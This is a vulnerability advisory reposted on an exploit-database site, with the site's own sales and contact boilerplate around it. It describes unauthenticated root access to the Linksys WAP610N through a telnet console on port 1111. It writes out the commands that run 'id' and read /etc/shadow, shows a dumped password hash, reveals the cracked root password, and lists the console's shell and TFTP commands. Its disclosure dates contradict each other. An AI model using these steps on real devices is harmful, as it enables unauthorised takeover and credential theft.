0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Linksys WAP610N Unauthenticated Root Access Security Vulnerability

Author

Matteo Ignaccolo

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges
Systems affected: WAP610N (Firmware Version: 1.0.01)
Systems not affected: --
Severity: High
Local/Remote: Remote
Vendor URL: http://www.linksysbycisco.com
Author(s): Matteo Ignaccolo m.ignaccolo () securenetwork it
Vendor disclosure: 14/06/2010
Vendor acknowledged: 14/06/2010
Vendor bugfix: 14/12/2010 (reply to our request for update)
Vendor patch release: ??
Public disclosure: 10/02/2010
Advisory number: SN-2010-08
Advisory URL:
http://www.securenetwork.it/ricerca/advisory/download/SN-2010-08.txt
 
 
*** SUMMARY ***
 
Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft.
 
Unauthenticated remote textual administration console has been found that
allow an attacker to run system command as root user.
 
 
*** VULNERABILITY DETAILS ***
 
telnet <access-point IP> 1111
 
Command> system id
Output>  uid=0(root) gid=0(root)
 
Coomand> system cat /etc/shadow
Ouptup>  root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7:::
Ouptup>  bin:*:10933:0:99999:7:::
Ouptup>  daemon:*:10933:0:99999:7:::
Ouptup>  adm:*:10933:0:99999:7:::
Ouptup>  lp:*:10933:0:99999:7:::
Ouptup>  sync:*:10933:0:99999:7:::
Ouptup>  shutdown:*:10933:0:99999:7:::
Ouptup>  halt:*:10933:0:99999:7:::
Ouptup>  uucp:*:10933
 
root password is "wlan" (cracked with MDcrack http://mdcrack.openwall.net)
 
List of console's command:
 
ATHENA_READ
ATHENA_WRITE
CHIPVAR_GET
DEBUGTABLE
DITEM
DMEM
DREG16
DREG32
DREG8
DRV_CAT_FREE
DRV_CAT_INIT
DRV_NAME_GET
DRV_VAL_GET
DRV_VAL_SET
EXIT
GENIOCTL
GETMIB
HELP
HYP_READ      
HYP_WRITE     
HYP_WRITEBUFFER
ITEM16
ITEM32
ITEM8
ITEMLIST
MACCALIBRATE
MACVARGET
MACVARSET
MEM_READ
MEM_WRITE
MTAPI
PITEMLIST
PRINT_LEVEL
PROM_READ
PROM_WRITE
READ_FILE
REBOOT
RECONF
RG_CONF_GET
RG_CONF_SET
RG_SHELL
SETMIB
SHELL
STR_READ
STR_WRITE
SYSTEM
TEST32
TFTP_GET
TFTP_PUT
VER
 
 
*** EXPLOIT ***
 
Attackers may exploit these issues through a common telnet client as explained
above.
 
 
*** FIX INFORMATION ***
 
No patch is available.
 
*** WORKAROUNDS ***
 
Put access points on separate wired network and filter network traffic to/from
1111 tcp port.
 


#  0day.today [2024-09-28]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Linksys WAP610N Unauthenticated Root Access Security Vulnerability

Report Error

Report Error